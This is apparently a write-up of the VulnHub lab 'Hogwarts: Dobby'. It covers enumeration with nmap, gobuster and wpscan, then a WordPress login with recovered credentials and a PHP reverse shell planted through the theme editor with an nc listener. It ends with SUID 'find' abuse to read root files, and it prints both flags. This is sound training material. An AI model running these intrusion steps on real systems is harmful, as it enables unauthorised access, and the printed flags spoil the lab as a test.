Hogwarts: Dobby vulnhub writeup

I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

So first, let’s decode the base64 string from http-title.

echo "dG9vIGVhc3kgbm8/IFBvdHRlcg=="|base64 -d
$>too easy no? Potter

Maybe a user…

I decided to check the website hosted on port 80. Let’s go see the source code, at the end we see this :

In /alohomora, we found this “Draco’s password is his house ;)”, the box is about Harry Potter so maybe we have draco:slytherin

Let’s make a Gobuster :

gobuster dir --url http://<IP>/--wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html -t 100

We found a /log directory, let’s check it :

We have a new directory and a password

This is a base64 string, decode it : ilikesocks. Maybe a password, let’s not forget it.

The /DiagonAlley take us on a WordPress site. Obviously there is a message to decode. I think it’s a Brainfuck string. We use the site to decode it. It give a strange message : donn……‹Ÿš§. We will see after if it can help us but I think is a rabbit hole

Let’s start a new Gobuster a the WordPress.

Wee found some basic WordPress sites. We will be interested in /wp-admin

Since this is a WordPress site, we will do a Wpscan with the -e u option to enumerate users.

wpscan --url http://<IP>/DiagonAlley/ -e u

Nothing interesting in this scan but we found two users (draco and Draco), maybe the same user

We can login on WordPress using user/pass that we found : Draco:slytherin

Now we upload a reverse shell on the section Apariencia>Editor de temas. Replace a page by a php reverse shell , start a listener and refresh the site

nc -nlvp 6666

The shell works fine

Spawn a shell with the following command :

/usr/bin/script -qc /bin/bash /dev/null

With cd /home and ls, we found the user dobby.

su with user:dobby password:ilikesocks

In /home/dobby, open the flag1.txt with vi because cat doesn’t work on this box :

flag1{28327a4964cb391d74111a185a5047ad}

Now, let’s do this command to find all setuid/setgid file on the system

find / -type f -perm /6000 -ls 2>/dev/null

We found an interesting one, /usr/bin/find. Let’s check if there is some exploitation with this command on this great site. And we found one.

First, let’s enumerate the root folder :

find . -exec ls /root/ \; -quit;

There is a proof.txt, open it :

find . -exec more /root/proof.txt \; -quit;

And we have the root flag :

root{63a9f0ea7bb98050796b649e85481845!!}

…well done